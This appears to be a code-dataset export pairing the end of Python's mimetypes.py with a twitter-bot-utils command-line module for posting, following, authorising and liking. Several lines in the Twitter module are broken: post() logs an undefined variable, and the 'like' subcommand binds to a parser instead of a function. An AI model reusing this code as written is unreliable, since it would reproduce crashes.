# Duplicates :(
'.cdf' : 'application/x-cdf',
'.cdf' : 'application/x-netcdf',
'.cpio' : 'application/x-cpio',
'.csh' : 'application/x-csh',
'.css' : 'text/css',
'.dll' : 'application/octet-stream',
'.doc' : 'application/msword',
'.dot' : 'application/msword',
'.dvi' : 'application/x-dvi',
'.eml' : 'message/rfc822',
'.eps' : 'application/postscript',
'.etx' : 'text/x-setext',
'.exe' : 'application/octet-stream',
'.gif' : 'image/gif',
'.gtar' : 'application/x-gtar',
'.h' : 'text/plain',
'.hdf' : 'application/x-hdf',
'.htm' : 'text/html',
'.html' : 'text/html',
'.ief' : 'image/ief',
'.jpe' : 'image/jpeg',
'.jpeg' : 'image/jpeg',
'.jpg' : 'image/jpeg',
'.js' : 'application/x-javascript',
'.ksh' : 'text/plain',
'.latex' : 'application/x-latex',
'.m1v' : 'video/mpeg',
'.man' : 'application/x-troff-man',
'.me' : 'application/x-troff-me',
'.mht' : 'message/rfc822',
'.mhtml' : 'message/rfc822',
'.mif' : 'application/x-mif',
'.mov' : 'video/quicktime',
'.movie' : 'video/x-sgi-movie',
'.mp2' : 'audio/mpeg',
'.mp3' : 'audio/mpeg',
'.mp4' : 'video/mp4',
'.mpa' : 'video/mpeg',
'.mpe' : 'video/mpeg',
'.mpeg' : 'video/mpeg',
'.mpg' : 'video/mpeg',
'.ms' : 'application/x-troff-ms',
'.nc' : 'application/x-netcdf',
'.nws' : 'message/rfc822',
'.o' : 'application/octet-stream',
'.obj' : 'application/octet-stream',
'.oda' : 'application/oda',
'.p12' : 'application/x-pkcs12',
'.p7c' : 'application/pkcs7-mime',
'.pbm' : 'image/x-portable-bitmap',
'.pdf' : 'application/pdf',
'.pfx' : 'application/x-pkcs12',
'.pgm' : 'image/x-portable-graymap',
'.pl' : 'text/plain',
'.png' : 'image/png',
'.pnm' : 'image/x-portable-anymap',
'.pot' : 'application/vnd.ms-powerpoint',
'.ppa' : 'application/vnd.ms-powerpoint',
'.ppm' : 'image/x-portable-pixmap',
'.pps' : 'application/vnd.ms-powerpoint',
'.ppt' : 'application/vnd.ms-powerpoint',
'.ps' : 'application/postscript',
'.pwz' : 'application/vnd.ms-powerpoint',
'.py' : 'text/x-python',
'.pyc' : 'application/x-python-code',
'.pyo' : 'application/x-python-code',
'.qt' : 'video/quicktime',
'.ra' : 'audio/x-pn-realaudio',
'.ram' : 'application/x-pn-realaudio',
'.ras' : 'image/x-cmu-raster',
'.rdf' : 'application/xml',
'.rgb' : 'image/x-rgb',
'.roff' : 'application/x-troff',
'.rtx' : 'text/richtext',
'.sgm' : 'text/x-sgml',
'.sgml' : 'text/x-sgml',
'.sh' : 'application/x-sh',
'.shar' : 'application/x-shar',
'.snd' : 'audio/basic',
'.so' : 'application/octet-stream',
'.src' : 'application/x-wais-source',
'.sv4cpio': 'application/x-sv4cpio',
'.sv4crc' : 'application/x-sv4crc',
'.svg' : 'image/svg+xml',
'.swf' : 'application/x-shockwave-flash',
'.t' : 'application/x-troff',
'.tar' : 'application/x-tar',
'.tcl' : 'application/x-tcl',
'.tex' : 'application/x-tex',
'.texi' : 'application/x-texinfo',
'.texinfo': 'application/x-texinfo',
'.tif' : 'image/tiff',
'.tiff' : 'image/tiff',
'.tr' : 'application/x-troff',
'.tsv' : 'text/tab-separated-values',
'.txt' : 'text/plain',
'.ustar' : 'application/x-ustar',
'.vcf' : 'text/x-vcard',
'.wav' : 'audio/x-wav',
'.wiz' : 'application/msword',
'.wsdl' : 'application/xml',
'.xbm' : 'image/x-xbitmap',
'.xlb' : 'application/vnd.ms-excel',
# Duplicates :(
'.xls' : 'application/excel',
'.xls' : 'application/vnd.ms-excel',
'.xml' : 'text/xml',
'.xpdl' : 'application/xml',
'.xpm' : 'image/x-xpixmap',
'.xsl' : 'application/xml',
'.xwd' : 'image/x-xwindowdump',
'.zip' : 'application/zip',
}
# These are non-standard types, commonly found in the wild. They will
# only match if strict=0 flag is given to the API methods.
# Please sort these too
common_types = {
'.jpg' : 'image/jpg',
'.mid' : 'audio/midi',
'.midi': 'audio/midi',
'.pct' : 'image/pict',
'.pic' : 'image/pict',
'.pict': 'image/pict',
'.rtf' : 'application/rtf',
'.xul' : 'text/xul'
}
_default_mime_types()
if __name__ == '__main__':
import getopt
USAGE = """\
Usage: mimetypes.py [options] type
Options:
--help / -h -- print this message and exit
--lenient / -l -- additionally search of some common, but non-standard
types.
--extension / -e -- guess extension instead of type
More than one type argument may be given.
"""
def usage(code, msg=''):
print(USAGE)
if msg: print(msg)
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], 'hle',
['help', 'lenient', 'extension'])
except getopt.error as msg:
usage(1, msg)
strict = 1
extension = 0
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-l', '--lenient'):
strict = 0
elif opt in ('-e', '--extension'):
extension = 1
for gtype in args:
if extension:
guess = guess_extension(gtype, strict)
if not guess: print("I don't know anything about type", gtype)
else: print(guess)
else:
guess, encoding = guess_type(gtype, strict)
if not guess: print("I don't know anything about type", gtype)
else: print('type:', guess, 'encoding:', encoding)
|
edmundgentle/schoolscript
|
SchoolScript/bin/Debug/pythonlib/Lib/mimetypes.py
|
Python
|
gpl-2.0
| 20,950
|
[
"NetCDF"
] |
6143f6ff33c58e059fbee4a1cd03c43f9887551a011ffed109b8db61fa47babd
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-17 Neil Freeman contact@fakeisthenewreal.org
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Command line interface for twitter-bot-utils"""
import logging
import sys
from argparse import ArgumentParser
import tweepy
from . import __version__ as version
from . import api, args, confighelper, tools
ARGS = ["config", "dry-run", "verbose", "quiet"]
AUTHORIZATION_FAILED_MESSAGE = "Authorization failed. Check that the consumer key and secret are correct."
DEPRECATION = "This command is deprecated. Please use the tbu command."
def fave_mentions(arguments=None):
"""Add a favorite to recent mentions."""
if arguments is None:
parser = ArgumentParser(description="fave/like mentions", usage="%(prog)s [options] screen_name")
parser.add_argument("screen_name", type=str)
args.add_default_args(parser, version=version, include=ARGS)
print(DEPRECATION, file=sys.stderr)
arguments = parser.parse_args()
twitter = api.API(arguments)
tools.fave_mentions(twitter, arguments.dry_run)
def auto_follow(arguments=None):
"""Follow-back recent followers."""
if arguments is None:
parser = ArgumentParser(
description="automatic following and unfollowing",
usage="%(prog)s [options] screen_name",
)
parser.add_argument("screen_name", type=str)
parser.add_argument("-U", "--unfollow", action="store_true", help="Unfollow those who don't follow you")
args.add_default_args(parser, version=version, include=ARGS)
arguments = parser.parse_args()
print(DEPRECATION, file=sys.stderr)
twitter = api.API(arguments)
if arguments.unfollow:
tools.unfollow(twitter, arguments.dry_run)
else:
tools.follow_back(twitter, arguments.dry_run)
def authenticate(arguments=None):
"""Authenticate with Twitter API"""
if arguments is None:
parser = ArgumentParser(description="Authorize an account with a twitter application.")
parser.add_argument("-c", metavar="file", type=str, default=None, dest="config_file", help="config file")
parser.add_argument("--app", metavar="app", type=str, help="app name in config file")
parser.add_argument("-s", "--save", action="store_true", help="Save details to config file")
parser.add_argument("--consumer-key", metavar="key", type=str, help="consumer key (aka consumer token)")
parser.add_argument("--consumer-secret", metavar="secret", type=str, help="consumer secret")
parser.add_argument("-V", "--version", action="version", version="%(prog)s " + version)
arguments = parser.parse_args()
print(DEPRECATION, file=sys.stderr)
# it's possible to pass keys and then save them to the files
if arguments.config_file:
file_name = confighelper.find_file(arguments.config_file)
config = confighelper.parse(file_name)
else:
file_name = None
config = {}
# Use passed credentials.
if arguments.consumer_key and arguments.consumer_secret:
consumer_key = arguments.consumer_key
consumer_secret = arguments.consumer_secret
# Go find credentials.
else:
try:
conf = config["apps"][arguments.app] if arguments.app else config
consumer_secret = conf["consumer_secret"]
consumer_key = conf["consumer_key"]
except KeyError as err:
msg = "Couldn't find consumer-key and consumer-secret for '{}' in {}".format(arguments.app, file_name)
raise KeyError(msg) from err
auth = tweepy.OAuthHandler(consumer_key, consumer_secret, "oob")
print(auth.get_authorization_url())
verifier = input('Please visit this url, click "Authorize app" and enter in the PIN:\n> ')
try:
auth.get_access_token(verifier)
except tweepy.error.TweepError:
print(AUTHORIZATION_FAILED_MESSAGE)
return
# True is the const passed when no file name is given
if arguments.save is not True:
file_name = arguments.save
# Save the keys back to the config file
if arguments.save and file_name:
apps = config["apps"] = config.get("apps", {})
users = config["users"] = config.get("users", {})
app = arguments.app or "default"
screen_name = auth.get_username().encode("utf-8")
apps[app] = apps.get(app, {})
apps[app].update(
{
"consumer_key": consumer_key,
"consumer_secret": consumer_secret,
}
)
users[screen_name] = users.get(screen_name, {})
users[screen_name].update(
{
"key": auth.access_token.encode("utf-8"),
"secret": auth.access_token_secret.encode("utf-8"),
"app": (arguments.app or "default"),
}
)
confighelper.dump(config, file_name)
print("Saved keys in {}".format(file_name))
# Or just print them
else:
print("key: {}\nsecret: {}".format(auth.access_token, auth.access_token_secret))
def post(arguments):
"""Post text to a given twitter account."""
twitter = api.API(arguments)
params = {}
if arguments.update == "-":
params["status"] = sys.stdin.read()
else:
params["status"] = arguments.update
if arguments.media_file:
medias = [twitter.media_upload(m) for m in arguments.media_file]
params["media_ids"] = [m.media_id for m in medias]
try:
logging.getLogger(arguments.screen_name).info("status: %s", params["status"])
if not arguments.dry_run:
twitter.update_status(**params)
except tweepy.TweepError as e:
logging.getLogger(arguments.screen_name).error(err)
def retweet(arguments):
"""Retweet a status"""
twitter = api.API(arguments)
twitter.retweet(id=arguments.id)
def main():
"""Command line interface for `tbu`."""
parser = ArgumentParser()
parser.add_argument("-V", "--version", action="version", version="%(prog)s " + version)
subparsers = parser.add_subparsers()
poster = subparsers.add_parser(
"post",
description="Post text to a given twitter account",
usage='%(prog)s screen_name "update" [options]',
)
poster.add_argument("screen_name", type=str)
poster.add_argument("update", type=str)
poster.add_argument("-m", "--media-file", type=str, action="append")
args.add_default_args(poster, include=["config", "dry-run", "verbose", "quiet"])
poster.set_defaults(func=post)
follow = subparsers.add_parser(
"follow",
description="automatic following and unfollowing",
usage="%(prog)s [options] screen_name",
)
follow.add_argument("screen_name", type=str)
follow.add_argument("-U", "--unfollow", action="store_true", help="Unfollow those who don't follow you")
follow.set_defaults(func=auto_follow)
auth = subparsers.add_parser(
"auth",
description="Authorize an account with a twitter application.",
usage="%(prog)s [options]",
)
auth.add_argument("-c", metavar="file", type=str, default=None, dest="config_file", help="config file")
auth.add_argument("--app", metavar="app", type=str, help="app name in config file")
auth.add_argument(
"-s",
"--save",
nargs="?",
const=True,
help="Save details to config file. If no file is given, uses file in --config.",
)
auth.add_argument("--consumer-key", metavar="key", type=str, help="consumer key (aka consumer token)")
auth.add_argument("--consumer-secret", metavar="secret", type=str, help="consumer secret")
auth.set_defaults(func=authenticate)
fave = subparsers.add_parser("like", description="fave/like mentions", usage="%(prog)s [options] screen_name")
fave.add_argument("screen_name", type=str)
fave.set_defaults(func=fave)
arguments = parser.parse_args()
arguments.func(arguments)
|
fitnr/twitter_bot_utils
|
src/twitter_bot_utils/cli.py
|
Python
|
gpl-3.0
| 8,641
|
[
"VisIt"
] |
1d39b425d8a04465dd9191ea59d872ebcb711d4c3b6cfd73f101fbbd85b83137
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.